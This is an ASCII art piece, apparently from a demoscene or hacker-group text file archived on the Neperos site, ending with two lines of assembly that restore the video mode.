,,,,,,,,,,,,,8,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,+
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=,,,,,,,,,,,,,,,,,,,,,,,,,,, :,,,~
,,,,:,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ZDDDDDD8~,,,,,,,,,,,,,,,I:,,,,,,,,,,,,,,,,,:
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,$,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=$,,,,=
=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,?:,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,D
D,~=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,7D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,D
7O,,8:,,,8,,,,?DDD$~,,,,,,,,,,,,:OD8O$I+:,,,,,,,,$,:,,,,,,,,,,,,,,,,,,,,,,,,,,DD
?D=,~D,,,,DO+,,,,,,,~88D,,,,,,,,,,,,,,,,,,,,,,,,ZDDO~,,,,,8DDI,,,ODDD,,,,,:DD7
OD?D,,,,,,,,,,:=IZDDDD,,,,,,,,,,,,,,,,,,,,,,DDDO7ZDDDD:,,:DD+,,,=,,,,,DDD
8$,,,,,,,,,,,,,~$DD7,,,,,,,,,,,,,,,,,,,,,$D,,,,,,,+$?,,,,,,,,,,,,,=D8
+DI,,,~,,,,~IZO8D~O,,,,,~,,,,,,,,,,,,:,ODZ:,,,,,,,,,,,,,,$,,,,~8DI
88=,,,8D7,,,DD,,,,,,,?,O,,,,,,,,,,7,DD+:,,,,,,D7,,,,,,,,$DDDD
=7OO88DD,,,,,,,Z,,,,,,,,,:,,D,DD+,,~$D8:,,,,,,,,,,,,OI
D,,,,,,,D,,,,,+,,,,?,D,DD= ?DI~,,:=I$DDD
D,:,,,,,D,,,,,D,,,,,,D,DD
D,=,,,,,D,,,I,D,,,,,,D,DD
D,,,,,,,D~,,,,?:,,,,,I=DD
D,,,,,,,DZ,,,,,D?,,,,:DDD
D,,,:,,8DD,,,,,DD+,,,,DDD
D,,~:,+D8,,7,,,,D7,,,,$DD
D=,?,,ZD$,,D,,,,DZ,,,,=DD
D7,O,,?DD,,D,,,,DD,,D,:DD
DD,D,,:DD,,D7,,,7D=,D,,DD7
DD,D,,,DD,,$8,,,~DDDD?,DDD
DD=D,,,DDI,,D,,,,DDDDD,DDD
7DDDD,,,DDD,,D:,O,DDDDD,DDD,,,,
DDDDDZ,,DDD,,DD,DODDDDD+DDDD,,,,,,
,DDDDDD,,DDDD,DDD+DDDDDDDDDDD~,,,,,,,
,,,,DDDDDDDDDDDDDDDDDDDDDDDDDDDDD,,,,,,,,,
,,,,=DDDDDDDDDDDDDDDDDDDDDDDDDDDDDI,,,,,,,,,
,,,,,DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD,,,,,,,,,
,,,,,:DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD?,,,,,,,,
,,,=+,DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD~,,,,,,,
=DD~,,+DD8,,:DD$,,,:=?I7$ZO888888888OOOOOO8DDD$~O8,
D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,87
D7,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,IO
+D,,,,,,,,,,,~,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,:+,,,,,,8
ZDD,,,,,DDDDDDDDDDDD+,~,,,,,,,,,:+I$ODDDDDD+,?D8,,,,8
,,DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD?,,:8D:
,ODDDDDN=8DDDDDDD,ZDDDDD7?I8DDDDDD,,,D ,,DDDDDDD ,,,,
8ZI8I,,,,7DDDDDD:,,?,,DDD,,,,~D=ZDDD,,,$+,,DDDDDDD8~,,
~D$?I,,,,,,ZDDDDDD:,,,,,,D,,,,,,,:D,,8DD,,,,,,,?8DD+DDDD
:D$,,,:O,,,,,OZ8DDDD+,,8,,,=~,,,,,,,,,,,,,O8,,,,,,,,,88,,DDDD+
$D7,,,,,I,,,,,,,,DDDDD?,,,,,,,?,,,,,,,,,,,,,,,,8,,,,,,,,,,7,,8DDDDD=
,ZDDDDDDDDDDDDDD888OOOOOZZ$$$$7777IIIII?????+++++==~~~~~:::::::,,:DDDDDDD8:
mov al,3 ; .aware cr3w restores video m0de - - = ==== = === =]
int 10h ; - = = = = ==== ======= === ======= = ======== =]
[================================= . . . as a last ditch effort. ==============]

← previous
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT